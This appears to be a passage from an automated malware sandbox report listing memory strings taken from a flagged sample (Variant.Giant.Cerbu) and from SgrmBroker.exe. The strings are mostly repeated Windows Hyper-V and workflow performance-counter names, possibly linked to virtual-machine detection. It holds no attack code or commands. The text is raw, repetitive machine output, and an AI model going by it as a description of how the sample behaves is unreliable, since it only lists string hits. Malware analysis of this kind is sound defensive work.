Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1665045921.00000245B110B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Swi
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B124A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Virtual Machine BusA
Source: SgrmBroker.exe, 00000018.00000002.2572548806.00000236AAFA7000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2444417839.00000236AD049000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2424523609.00000236AD048000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V HypervisorD0nf
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1653708046.00000245AF59A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flushes Base4972Hyper-V Hypervisor Root Virtual Processor4974Total Run Time4976Hypervisor Run Time4978Remote Node Run Time4980Normalized Run Time4982Ideal Cpu4984Hypercalls/sec4986Hypercalls Cost4988Page Invalidations/sec4990Page Invalidations Cost4992Control Register Accesses/sec4994Control Register Accesses Cost4996IO Instructions/sec4998IO Instructions Cost5000HLT Instructions/sec5002HLT Instructions Cost5004MWAIT Instructions/sec5006MWAIT Instructions Cost5008CPUID Instructions/sec5010CPUID Instructions Cost5012MSR Accesses/sec5014MSR Accesses Cost5016Other Intercepts/sec5018Other Intercepts Cost5020External Interrupts/sec5022External Interrupts Cost5024Pending Interrupts/sec5026Pending Interrupts Cost5028Emulated Instructions/sec5030Emulated Instructions Cost5032Debug Register Accesses/sec5034Debug Register Accesses Cost5036Page Fault Intercepts/sec5038Page Fault Intercepts Cost5040NMI Interrupts/sec5042NMI Interrupts Cost5044Guest Page Table Maps/sec5046Large Page TLB Fills/sec5048Small Page TLB Fills/sec5050Reflected Guest Page Faults/sec5052APIC MMIO Accesses/sec5054IO Intercept Messages/sec5056Memory Intercept Messages/sec5058APIC EOI Accesses/sec5060Other Messages/sec5062Page Table All
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B11CC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V VM Vid Partitionr
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B124A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: DHyper-V Virtual Machine Bus Pipes
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B124A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: &Hyper-V Hypervisorn
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1657405472.00000245AF5A7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flushes Base4972Hyper-V Hypervisor Root Virtual Processor4974Total Run Time4976Hypervisor Run Time4978Remote Node Run Time4980Normalized Run Time4982Ideal Cpu4984Hypercalls/sec4986Hypercalls Cost4988Page Invalidations/sec4990Page Invalidations Cost4992Control Register Accesses/sec4994Control Register Accesses Cost4996IO Instructions/sec4998IO Instructions Cost5000HLT Instructions/sec5002HLT Instructions Cost5004MWAIT Instructions/sec5006MWAIT Instructions Cost5008CPUID Instructions/sec5010CPUID Instructions Cost5012MSR Accesses/sec5014MSR Accesses Cost5016Other Intercepts/sec5018Other Intercepts Cost5020External Interrupts/sec5022External Interrupts Cost5024Pending Interrupts/sec5026Pending Interrupts Cost5028Emulated Instructions/sec5030Emulated Instructions Cost
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1656667178.00000245AF5A6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: d6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flushes Base4972Hyper-V Hypervisor Root Virtual Processor4974Total Run Time4976H
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B11C1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: &Hyper-V HypervisorrD
Source: SgrmBroker.exe, 00000018.00000002.2573746775.00000236ACA50000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Hypervisor Root Partitionl5
Source: SgrmBroker.exe, 00000018.00000002.2573746775.00000236ACA50000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000002.2572548806.00000236AAFA7000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2424523609.00000236AD00E000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2445898978.00000236AD001000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V VM Vid Partition
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B11CC000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B124A000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2445898978.00000236AD038000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000002.2572548806.00000236AAFA7000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2424523609.00000236AD039000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Hypervisor Root Partition
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B124A000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000002.2573746775.00000236ACA50000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VHyper-V Dynamic Memory Integration Service
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B124A000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000002.2573746775.00000236ACA50000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VHyper-V Dynamic Memory Integration Service
Source: SgrmBroker.exe, 00000018.00000003.2445898978.00000236AD038000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000002.2572548806.00000236AAFA7000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2424523609.00000236AD039000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Hypervisor0Y9
Source: SgrmBroker.exe, 00000018.00000002.2572548806.00000236AAFA7000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2444417839.00000236AD049000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2424523609.00000236AD048000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 2Hyper-V VM Vid Partitionem)
Source: SgrmBroker.exe, 00000018.00000002.2573746775.00000236ACA50000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000002.2572548806.00000236AAFA7000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2444417839.00000236AD049000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2424523609.00000236AD048000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Virtual Machine Bus Pipes
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B124A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Virtual Machine Bus Pipes_@z
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B124A000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000002.2573746775.00000236ACA50000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: JHyper-V Hypervisor Logical Processor
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B124A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Hypervisor Logical ProcessorllKAw
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B124A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 2Hyper-V VM Vid PartitionY
Source: SgrmBroker.exe, 00000018.00000002.2573746775.00000236ACA50000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: THyper-V Hypervisor Root Virtual Processorexe
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1664616460.00000245B0E61000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 6242WorkflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O T
Source: SgrmBroker.exe, 00000018.00000002.2573746775.00000236ACA50000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Hypervisor Logical Processor.syse
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B11CC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V VM Vid Partitionll
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B11CC000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B124A000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2445898978.00000236AD038000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000002.2573746775.00000236ACA50000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000002.2572548806.00000236AAFA7000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2424523609.00000236AD039000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Hypervisor Root Virtual Processor
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B124A000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000002.2573746775.00000236ACA50000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: X2Hyper-V VM Vid Partition
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1653708046.00000245AF59A000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2377021004.00000236AB074000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flus
Source: SgrmBroker.exe, 00000018.00000002.2573746775.00000236ACA50000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: THyper-V Hypervisor Root Virtual Processor
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B11CC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Hypervisor Logical Processorc.sysO
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B124A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: THyper-V Hypervisor Root Virtual Processor.
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B124A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: JHyper-V Hypervisor Logical Processor
Source: SgrmBroker.exe, 00000018.00000002.2573746775.00000236ACA50000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: AlDHyper-V Virtual Machine Bus Pipes8
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B124A000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000002.2573746775.00000236ACA50000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: sWDHyper-V Hypervisor Root Partition
Source: SgrmBroker.exe, 00000018.00000003.2375167971.00000236AB080000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: n Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flushes Base4972Hyper-V Hypervisor Root Virtual Processor4974Total Run Time4976Hypervisor Run Time4978Remote Node Run Time4980Normalized Run Time4982Ideal Cpu4984Hypercalls/sec4986Hypercalls Cost4988Page Invalidations/sec4990Page Invalidations Cost4992Control Register Accesses/sec4994Control Register Accesses Cost4996IO Instructions/sec4998IO Instructions Cost5000HLT Instructions/sec5002HLT Instructions Cost5004MWAIT Instructions/sec5006MWAIT Instructions Cost5008CPUID Instructions/sec5010CPUID Instructions Cost5012MSR Accesses/sec5014MSR Accesses Cost5016Other Intercepts/sec5018Other Intercepts Cost5020External Interrupts/sec5022External Interrupts Cost5024Pending Interrupts/sec5026Pending Interrupts Cost5028Emulated Instructions/sec5030Emulated Instructions Cost
Source: SgrmBroker.exe, 00000018.00000002.2572548806.00000236AAFA7000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2444417839.00000236AD049000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2424523609.00000236AD048000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: &Hyper-V Hypervisors(x'bs
Source: SgrmBroker.exe, 00000018.00000002.2573746775.00000236ACA50000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: &Hyper-V Hypervisor
Source: SgrmBroker.exe, 00000018.00000002.2572548806.00000236AAFA7000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2444417839.00000236AD049000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2424523609.00000236AD048000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Dynamic Memory Integration ServicefwP
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B124A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: DHyper-V Hypervisor Root Partition1
Source: SgrmBroker.exe, 00000018.00000003.2374064581.00000236AB07F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: s Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flushes Base4972Hyper-V Hypervisor Root Virtual Processor4974Total Run Time4976Hypervisor Run Time4978Remote Node Run Time4980Normalized Run Time4982Ideal Cpu4984Hypercalls/sec4986Hypercalls Cost4988Page Invalidations/sec4990Page Invalidations Cost4992Control Register Acc
